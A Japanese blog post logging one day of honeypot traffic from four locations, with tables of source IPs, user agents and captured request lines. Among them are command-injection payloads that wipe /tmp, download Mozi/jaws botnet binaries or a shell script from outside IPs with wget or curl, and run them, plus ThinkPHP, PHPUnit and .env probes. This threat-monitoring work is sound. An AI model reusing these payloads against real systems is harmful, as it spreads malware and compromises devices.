コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/09/11 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/09/11分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

CensysInspectによるスキャン行為
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  37.0.9.122/jaws;
sh /tmp/jaws
Location:US

Confluence ServerおよびData Centerの脆弱性(CVE-2021-26084)を狙うアクセス
Seagate BlackArmor NAS脆弱性を狙うアクセス
aiohttpによるスキャン行為
Darkによるスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//58[.]249[.]88[.]139:47966/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws
Location:UK

Drupal脆弱性を狙うアクセス
Oracle WebLogic脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
を確認しました。

Location:SG

Confluence ServerおよびData Centerの脆弱性(CVE-2021-26084)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
Nucleiによるスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

アクセス数推移

JP:総アクセス数:60 (前日比:+2)
US:総アクセス数:279 (前日比:+234)
UK:総アクセス数:125 (前日比:+76)
SG:総アクセス数:152 (前日比:+101)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 31.44.185.115 Russia
1 45.143.99.69 Turkey
22 45.146.164.110 Russia
1 113.187.30.136 Vietnam
1 124.91.104.17 China
2 135.125.244.48 France
6 135.125.246.189 France
1 137.184.15.8 United States
1 143.244.169.254 United States
2 159.65.88.210 United States
7 159.89.112.239 United States
3 162.62.8.135 Singapore
1 165.22.80.30 United States
1 182.208.141.235 South Korea
1 185.220.101.239 Germany
1 185.235.14.146 Canada
1 196.64.149.128 Morocco
3 199.19.224.165 United States
1 209.17.97.66 United States
1 212.192.246.200 Czechia
1 216.250.253.143 United States
1 221.13.191.156 China

UserAgent一覧

件数 UserAgent
10 -
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36
13 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 python-requests/2.26.0

リクエスト内容一覧

件数 Method Request Protocol
4 \x16\x03\x01
1 \x16\x03\x01\x01\xfa\x01
15 GET /.env HTTP/1.1
1 GET /.env HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /c/version.js HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /mailman/listinfo/mailman HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//113[.]187[.]30[.]136:45304/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 37.0.9.122/jaws;sh+/tmp/jaws
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD / HTTP/1.0\n
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
101 1.191.61.14 China
63 18.218.45.78 United States
29 18.222.213.14 United States
1 20.199.122.97 United States
1 23.90.160.114 United States
1 31.44.185.115 Russia
18 35.238.166.178 United States
2 38.68.46.223 United States
2 45.9.20.52 Russia
1 45.95.147.10 Netherlands
22 45.146.164.110 Russia
1 49.89.193.72 China
1 58.249.88.139 China
1 66.240.205.34 United States
1 94.232.42.169 Russia
1 95.135.101.97 Ukraine
3 135.125.217.54 France
2 137.184.101.177 United States
1 138.68.161.204 United States
1 167.172.73.56 United States
1 182.59.62.85 India
18 193.169.255.207 Poland
5 199.19.224.165 United States
1 212.192.246.200 Czechia
1 217.182.219.181 France

UserAgent一覧

件数 UserAgent
8 -
1 Dark
1 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
58 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
63 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 10.0; .NET CLR 3.1.1285; Win64; x64)
2 Python/3.7 aiohttp/3.7.4.post0
2 python-requests/2.18.4
29 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 \x03
1 \x16\x03\x01\x01\xfb\x01
8 GET /.env HTTP/1.1
1 GET /.env HTTP/1.0
1 GET /.local HTTP/1.1
1 GET /.production HTTP/1.1
1 GET /.remote HTTP/1.1
1 GET //admin/.env HTTP/1.1
1 GET //administrator/.env HTTP/1.1
1 GET //api/.env HTTP/1.1
1 GET //app/.env HTTP/1.1
1 GET //apps/.env HTTP/1.1
1 GET //assets/.env HTTP/1.1
1 GET //config/.env HTTP/1.1
1 GET //core/.env HTTP/1.1
1 GET //core/Datavase/.env HTTP/1.1
1 GET //core/app/.env HTTP/1.1
1 GET //cron/.env HTTP/1.1
1 GET //cronlab/.env HTTP/1.1
1 GET //database/.env HTTP/1.1
1 GET //en/.env HTTP/1.1
1 GET //exapi/.env HTTP/1.1
1 GET //lab/.env HTTP/1.1
1 GET //laravel/.env HTTP/1.1
1 GET //lib/.env HTTP/1.1
1 GET //psnlink/.env HTTP/1.1
1 GET //public/.env HTTP/1.1
1 GET //saas/.env HTTP/1.1
1 GET //site/.env HTTP/1.1
1 GET //sitemaps/.env HTTP/1.1
1 GET //tools/.env HTTP/1.1
1 GET //uploads/.env HTTP/1.1
1 GET //v1/.env HTTP/1.1
1 GET //v2/.env HTTP/1.1
1 GET //vendor/.env HTTP/1.1
1 GET //web/.env HTTP/1.1
2 GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /administrator/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+http[:]//212[.]192[.]241[.]72/lolol.sh;curl+-O+http[:]//212[.]192[.]241[.]72/lolol.sh;sh+lolol[.]sh HTTP/1.1
2 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /config/.env HTTP/1.1
5 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /cron/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /lib/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
2 GET /media/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /remote/login HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//49[.]89[.]193[.]72:53090/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]249[.]88[.]139:47966/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /site/.env HTTP/1.1
2 GET /site/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
2 GET /test/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /uploads/.env HTTP/1.1
1 GET /v1/.env HTTP/1.1
3 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/.env HTTP/1.1
2 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /xmlrpc.php?rsd HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
29 15.206.27.217 United States
1 31.44.185.115 Russia
1 45.95.147.10 Netherlands
11 45.146.164.110 Russia
1 50.228.252.210 United States
1 84.53.229.231 Russia
1 93.145.205.130 Italy
1 112.254.49.136 China
1 123.9.238.106 China
65 130.61.39.91 United States
2 139.59.85.129 Singapore
1 149.129.50.37 Singapore
7 165.227.35.137 United States
2 199.19.224.165 United States
1 212.192.246.200 Czechia

UserAgent一覧

件数 UserAgent
5 -
1 Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
65 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
1 Roku/DVP-9.10 (289.10E04111A)
1 python-requests/2.18.4
29 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
2 GET /.env HTTP/1.1
1 GET /.env HTTP/1.0
1 GET /.git/HEAD HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/info/config HTTP/1.1
1 GET /administrator/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /api/spec.json HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /config/.env HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /console/css/%252E%252E%252Fconsole.portal HTTP/1.1
1 GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
1 GET /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
1 GET /console/images/%252e%252e%252fconsole.portal HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /cron/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /lib/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /nmaplowercheck1631298333 HTTP/1.1
1 GET /opc/v1/identity HTTP/1.1
1 GET /opc/v1/instance HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//112[.]254[.]49[.]136:43540/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /spec/api.json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /ui HTTP/1.1
1 GET /uploads/.env HTTP/1.1
1 GET /v1/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//www[.]proxylists[.]net/proxyjudge.php HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD /actuator HTTP/1.1
1 HEAD /actuator/auditevents HTTP/1.1
1 HEAD /actuator/beans HTTP/1.1
1 HEAD /actuator/conditions HTTP/1.1
1 HEAD /actuator/configprops HTTP/1.1
1 HEAD /actuator/env HTTP/1.1
1 HEAD /actuator/health HTTP/1.1
1 HEAD /actuator/heapdump HTTP/1.1
1 HEAD /actuator/httptrace HTTP/1.1
1 HEAD /actuator/hystrix.stream HTTP/1.1
1 HEAD /actuator/info HTTP/1.1
1 HEAD /actuator/jolokia HTTP/1.1
1 HEAD /actuator/loggers HTTP/1.1
1 HEAD /actuator/mappings HTTP/1.1
1 HEAD /actuator/metrics HTTP/1.1
1 HEAD /actuator/scheduledtasks HTTP/1.1
1 HEAD /actuator/threaddump HTTP/1.1
1 HEAD /auditevents HTTP/1.1
1 HEAD /autoconfig HTTP/1.1
1 HEAD /beans HTTP/1.1
1 HEAD /cloudfoundryapplication HTTP/1.1
1 HEAD /configprops HTTP/1.1
1 HEAD /dump HTTP/1.1
1 HEAD /env HTTP/1.1
1 HEAD /health HTTP/1.1
1 HEAD /heapdump HTTP/1.1
1 HEAD /hystrix.stream HTTP/1.1
1 HEAD /info HTTP/1.1
1 HEAD /jolokia HTTP/1.1
1 HEAD /loggers HTTP/1.1
1 HEAD /mappings HTTP/1.1
1 HEAD /metrics HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 HEAD /threaddump HTTP/1.1
1 HEAD /trace HTTP/1.1
11 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PROPFIND / HTTP/1.1
1 RZPI / HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 31.44.185.115 Russia
1 34.65.112.31 United States
29 34.222.104.92 United States
22 45.146.164.110 Russia
5 50.31.21.11 United States
4 66.240.192.138 United States
2 101.227.1.198 China
1 103.28.70.137 United States
1 103.156.16.126 Indonesia
1 115.54.209.186 China
1 119.36.198.95 China
1 120.85.116.215 China
1 128.199.54.236 United Kingdom
3 135.125.217.54 France
1 138.68.161.204 United States
1 143.244.169.254 United States
3 163.172.161.118 United Kingdom
7 167.172.72.217 United States
54 176.103.88.57 Russia
1 193.200.50.189 Poland
1 209.17.96.66 United States
7 211.40.129.246 South Korea
3 212.47.244.68 France
1 212.192.246.200 Czechia

UserAgent一覧

件数 UserAgent
11 -
2 Chrome/54.0 (Windows NT 10.0)
1 Hello, World
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
6 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
54 Nuclei - Open-source project (github[.]com/projectdiscovery/nuclei)
1 Roku/DVP-9.10 (289.10E04111A)
1 python-requests/2.18.4
29 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
2 \x16\x03\x01
1 \x16\x03\x01\x01\xfb\x01
2 CONNECT www[.]bing[.]com:443 HTTP/1.1
8 GET /.env HTTP/1.1
1 GET /.env HTTP/1.0
1 GET /.env.prod HTTP/1.1
1 GET /.env.schema HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
1 GET /HNAP1 HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/env.json/ HTTP/1.1
1 GET /actuator/env/ HTTP/1.1
1 GET /ad-formats-widget/js/envConfig.js HTTP/1.1
1 GET /ad/creative/display/js/envConfig.js HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /administrator/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/env.json HTTP/1.1
1 GET /application/env.json/ HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /assets%2e%2e/.env HTTP/1.1
1 GET /assets%2e%2e/env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /c/version.js HTTP/1.1
2 GET /config/.env HTTP/1.1
1 GET /config/env HTTP/1.1
1 GET /config/environment.rb HTTP/1.1
1 GET /config/environments HTTP/1.1
1 GET /config/environments/development.rb HTTP/1.1
1 GET /config/environments/production.rb HTTP/1.1
1 GET /config/environments/test.rb HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /content_server/config/environments/development.rb HTTP/1.1
1 GET /content_server/config/environments/production.rb HTTP/1.1
1 GET /content_server/config/environments/staging.rb HTTP/1.1
1 GET /content_server/config/environments/test.rb HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /cron/.env HTTP/1.1
1 GET /dashboard/env.html HTTP/1.1
1 GET /dashboard/js/envConfig.js HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /env HTTP/1.1
1 GET /env.json/ HTTP/1.1
1 GET /env/lib/.git/config HTTP/1.1
1 GET /envConfig.js HTTP/1.1
1 GET /environments/environment.prod.ts HTTP/1.1
1 GET /environments/environment.ts HTTP/1.1
1 GET /evox/about HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /icons%2e%2e/.env HTTP/1.1
1 GET /icons%2e%2e/env HTTP/1.1
1 GET /images%2e%2e/.env HTTP/1.1
1 GET /images%2e%2e/env HTTP/1.1
1 GET /img%2e%2e/.env HTTP/1.1
1 GET /img%2e%2e/env HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /js%2e%2e/.env HTTP/1.1
1 GET /js%2e%2e/env HTTP/1.1
1 GET /js/envConfig.js HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /lib/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /media%2e%2e/.env HTTP/1.1
1 GET /media%2e%2e/env HTTP/1.1
1 GET /nmaplowercheck1631246925 HTTP/1.1
1 GET /ooh/js/envConfig.js HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /root/.rbenv/plugins/ruby-build/.git/config HTTP/1.1
2 GET /scripts/config/env/default.js HTTP/1.1
